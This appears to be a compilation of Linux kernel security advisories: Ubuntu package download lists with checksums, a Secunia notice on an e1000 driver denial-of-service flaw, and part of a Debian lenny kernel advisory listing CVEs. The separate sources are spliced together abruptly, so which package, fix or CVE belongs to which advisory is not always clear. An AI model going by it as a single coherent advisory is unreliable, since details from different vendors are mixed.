  Size/MD5:   166012 f708e9e4ad641fa6275a5a3e535b06ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    36362 143f93890826df238056a1e5f43bc07a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    36486 13949aaa8ad32338fff3c56ad0780c9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:   156928 9888f0f521ed580da0aa3eee88db9ee9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:   157200 14718c7817980def8cefe742fc25f4b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    90206 9b4f0a5ae4ecc56928710578948e8aa8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    91098 72d98fe1c957a6533d0e92bcd9df126f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    48114 c156299aa317a60124657975ba0422cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    48158 41a0c6cdd72641fc6327c91e2a41303e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:     9106 b3c84333d67154196fe492330ec937f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:     9112 c6d1478d99deba24df0f1abc7a1c6360
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    37450 d41485700623523bc62b122a67f57f37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    37472 8c553307ba6fec0874a4767f46eac97c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    93834 49462cab3b38d4e445456e6496f688e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    94402 a0ab7d68e42751978e478e46b39c8b58
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:  1555960 02d24e085fcacdc34b770d8e4b3e60c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:  1506776 e05a832ffa4bb240518968c28eb05fd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    37966 d5bd6c357df20158f33dc5d8b898786e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    37970 b1917a566671571351108712ea8b7cea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    15568 0094f62a06418771e1b7ce988e5229dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    15580 5f1e986aa2e88d63d62322ec85e8da17
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    50002 d7a47201c272480d804ab92e91a9c00f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    50056 08be19a737d5c6b1b99b21c072e28d75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:   123832 091e7733c12a45745381b4fe35d3640b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:   124268 2e5ad0b6c7b80907a9927bb37446aa06
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    15488 0afa442071262b64ba4fbfe594b44306
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:     5710 b999ccf838edc897b8874914e3f25148
http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb
  Size/MD5:    20788 7140a98dd26b05e5278d938a02b9af4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb
  Size/MD5:    20798 a2cab82a0956e6ec96375cd9f6e23a29

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   340852 5448ca0d59837472e8062a7758249b05
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   281626 20cdb99682c1f387eedd2dfdccc39c0b
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    60558 30fa795c08458a313f3a04c3ac06b833
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    68708 65c5e7b743e6e041e55ab080726e6326
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    48390 9d549e434d1f43ca803c400337537735
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    53128 e1b19e86e96b2a705f52257d0ba3e446
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    96780 69931c2ff42e93b841cbc39040b5f30b
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   109864 55530222d62b149471f8f7ec0a0b401c
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    41000 e504306368b70e7b1d4080fb9f104774
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    40386 867836bfd128cb699b6084d22ae5b9ba
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   598544 7c74713ce524ca6056f98b948ba1009d
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   631378 f6d7ccfc08940e0f182d7c347aa6fe1b
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   155250 5e58765f9014ac1b91db52377be3214e
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   150514 1c673dcbb00b8bdb03c140e2c16c1c0b
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   106286 f66ae752322b3a80afd81acce9678c54
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   110218 b81a7936f5d028e6e2d1b0c66ec67a82
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   418794 7614b2ba143ebc43a4df17d3a553f07c
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   355170 c461e16d2638bbd922ba08faa3aadb1f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  4184440 fcf9a52cf7d828353fc20fc42f04074e
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  5568942 e1244e4847aa34cefffd29c5e69d17da
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb
  Size/MD5:   834094 d2a5a47fe19b15efcbade3a458886100
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb
  Size/MD5:   853586 41d8ab0b3bac34b9ef18b3bd1751c06a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb
  Size/MD5:   834092 e1e2aa29e1424aef7ee116b1aa782e44
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc-smp_2.6.32-22.35_powerpc.deb
  Size/MD5: 27690922 d93d95c548c34b5632bddc5f69e7c400
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.35_powerpc.deb
  Size/MD5: 28531758 631a3347cb263b30bbac36ecfc73b928
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.35_powerpc.deb
  Size/MD5: 27421200 9068bbc77af845ca5b609d63bacd3308
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_powerpc.deb
  Size/MD5:   760646 0e4b57d343052f30433529cbe14385ab
http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_powerpc.deb
  Size/MD5:   196496 08665e49676e012315b941d37f838812
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   289406 e171a625ccdacd6709fee1c6e116e3bf
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   310398 ac3b6dacc77e4002ca825e265bbedea2
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   221150 6a0092ae1be40ca9ee127b2232d15cb0
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   223804 af7ba0faf09abaf57945a5e7fc2ee506
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    31938 5101007b3b2c9c45eb839952ff705786
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    36496 5dbc40f2acca40498c173d0886f9c2fb
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   343926 8c91a96bd0c3c6cc134532d13fd3d37e
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   385810 4a30a8fe1a7d7c1367938575c185f169
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  2173120 cb265da97dfe62f146fd1fe41ebfc1f9
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  2372824 8525c63c57d9345520be8210544f214c
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   223066 00121583edd924fe1757fa727ce876f3
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   217338 72c2573434f500ed671fa00582074ca7
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   259842 55eca2948a90fd62fa2e4ff0a9af80c9
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   296094 bfda8ec67edf7abd1478a60b126995ac
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   131886 ad03d7e0dbe804de4593e2fb86ebc4d0
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   154672 b67bb554dccec4c27d6accfbc97de8e4
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    50974 ee184ba015afebe43b7d67545684a609
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    45510 62e72d83114e691e6644f77328eae811
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   108060 869c7fefad265a86e620a08b85dccca2
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   123884 14b554ea470bda34e64f0d1df7fc6516
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    84352 1f3ffcebad40e4289c58fb81aec0855e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    89956 8f8f82acc6aad562a95d254c5fac022c
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    77236 e74748e50bc049e1ca8abd0babfcae76
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    28408 34f21190bd3bbd99cbcd25074d41faaa
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:     8958 91a68cc7a6fe6edf7ac0be03e165b4da
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    10186 b4b821de875ffd8607a5f867f42854cc
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    62110 8194a3936a0ec9bbdc1866f8201d7015
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    72518 009ef857c62f697f9ee69284634b274f
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   106886 da2d5917ae498c3078ebbd70ff3da14b
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   136600 e6165d5923d6aefd3f3398010ee23694
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  1648486 4f570da059c50025d135c0e3f75ccd5e
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:  1575088 c836ac8e48f8d71fabddbba3b950c198
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    78218 eddd03eab6e34af5a232892afc3bca0a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    83474 0ef56c605b39df3e5edfb67682ae2c06
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    17454 c7dbbca300fc48245cd4cfcf51d5b35d
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    18520 94418ced4448d327ec47dc602c17241a
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    67940 7a38341b4bc2c79511068590fc302c01
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    80278 e54c3d70347bae3108d67b1bc2bc4516
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   152200 1dc38fce24ffad9be140b3948e356e05
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:   159704 c78e3cd87f71f9a728004fd7e546cb50
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    22518 a83c7b1e9ffa2a3660bb41fbd3fcbaca
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb
  Size/MD5:    25778 b7471dba3ec7b8c05d5ea5739933fe93

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   146488 3b7be44529c4cc86514657ac7b12b12b
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    71440 aad8b8756f92832f4febd71db1f966dd
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    47602 3db40ba1ebd556f46b88da6dbed5c5d3
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    98038 101ce2471c33a479cf85df2b2e2c5211
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   591060 cf8fb919251529d57a1f318311b3707a
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   151664 20c364a8b683a0c4ba27567503cf5296
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    99356 e0c14c26cb974c7825f345cd70429841
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  3186134 44a50ae97caf252433b0ecfac295ec59
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb
  Size/MD5:   652300 cd39dcccee9c7a771274cdf208530af6
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb
  Size/MD5:   651290 f71657ec5a90274fe87615325f631740
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64-smp_2.6.32-22.35_sparc.deb
  Size/MD5: 22598018 851cda52ff2ffdd88b0732c63f74b5c8
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-sparc64_2.6.32-22.35_sparc.deb
  Size/MD5: 22149494 2e6f4fc8428d316ccf24367738ec4cdb
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_sparc.deb
  Size/MD5:   771020 0f4a6d78f1bfc4c66dec85397a1dfe38
http://ports.ubuntu.com/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_sparc.deb
  Size/MD5:   198080 42b0b00c0a74c8f19e63959105f8312f
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   280878 fd57b5da83294769b64c507d1819bf0e
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   214702 5aacff2a187543bc7c03d401f68607be
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    31894 37e7ede984e9a95085fef957bd24f9d3
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   337020 a60a63332965ca2e7eb04b9e5af55555
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  1765768 473b47001814ec3dcfe3f7d13b591ddf
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   246854 4fcf74412f97aaad8445b41a8568ed9d
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   139988 d2f75d8b75b929fbf9220da8bdf7e589
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    39912 a365983317c1b3c4dda94e11903aff3b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   206902 462e5550a90007c8c5418938dd676f6b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:     9178 c9f2992677c044041a448845a7d38b11
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    64466 52cf00bc003b8b5701298fad5517731f
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   212946 fbbb948d246dbea1ce131546d8bf6c2e
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:  1272618 4aec314341cdc776f20508b90866f5ae
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    96624 f0995ec49806ff5ede44bd80ff510d6e
http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    17702 9eb7b43e2289a69f9dcd478a5dc8d754
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   208204 b7724ff354d34b60cf7e2c5f50e61637
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:   193306 12a8a53ca0ef921b491d73d2bc051f73
http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb
  Size/MD5:    27206 6ae9400c4f74471e4b0baa8e12220191

. ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


TITLE: Linux Kernel e1000 Driver Denial of Service Vulnerability

SECUNIA ADVISORY ID: SA35265

VERIFY ADVISORY: http://secunia.com/advisories/35265/

DESCRIPTION: A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error in the "e1000_clean_rx_irq()" function in drivers/net/e1000/e1000_main.c.

SOLUTION: Fixed in the GIT repository. http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10

PROVIDED AND/OR DISCOVERED BY: Neil Horman

ORIGINAL ADVISORY: http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. Fixes for CVE-2010-0419 caused failures when using KVM in certain situations.

We apologize for the inconvenience. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-4537

Fabian Yamaguchi reported a missing check for Ethernet frames larger
than the MTU in the r8169 driver.

CVE-2010-0727

Sachin Prabhu reported an issue in the GFS2 filesystem.

CVE-2010-1083

Linus Torvalds reported an issue in the USB subsystem, which may allow
local users to obtain portions of sensitive kernel memory.

CVE-2010-1087

Trond Myklebust reported an issue in the NFS filesystem. This has an unknown
security impact.

CVE-2010-1173

Chris Guo from Nokia China and Jukka Taimisto and Olli Jarva from
Codenomicon Ltd reported an issue in the SCTP subsystem that allows
a remote attacker to cause a denial of service using a malformed init
package.

CVE-2010-1187

Neil Hormon reported an issue in the TIPC subsystem.

CVE-2010-1437

Toshiyuki Okajima reported a race condition in the keyring subsystem.

CVE-2010-1446

Wufei reported an issue with kgdb on the PowerPC architecture,
allowing local users to write to kernel memory. Note: this issue
does not affect binary kernels provided by Debian. The fix is
provided for the benefit of users who build their own kernels
from Debian source.

CVE-2010-1451

Brad Spengler reported an issue on the SPARC architecture that allows
local users to execute non-executable pages. See the referenced Debian bug page for details.

For the stable distribution (lenny), these problems have been fixed in version 2.6.26-22lenny1.

We recommend that you upgrade your linux-2.6 and user-mode-linux packages.

The following matrix lists additional source packages that were rebuilt for compatibility with or to take advantage of this update:

                                         Debian 5.0 (lenny)
 user-mode-linux                         2.6.26-1um-2+22lenny1

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny


Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.dsc Size/MD5 checksum: 5778 713b8a3f2bc10816264a81c0a9eb7860 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-22lenny1.diff.gz Size/MD5 checksum: 7894925 86ecf2ca8808aea84b0af06317616a6c

Architecture independent packages:

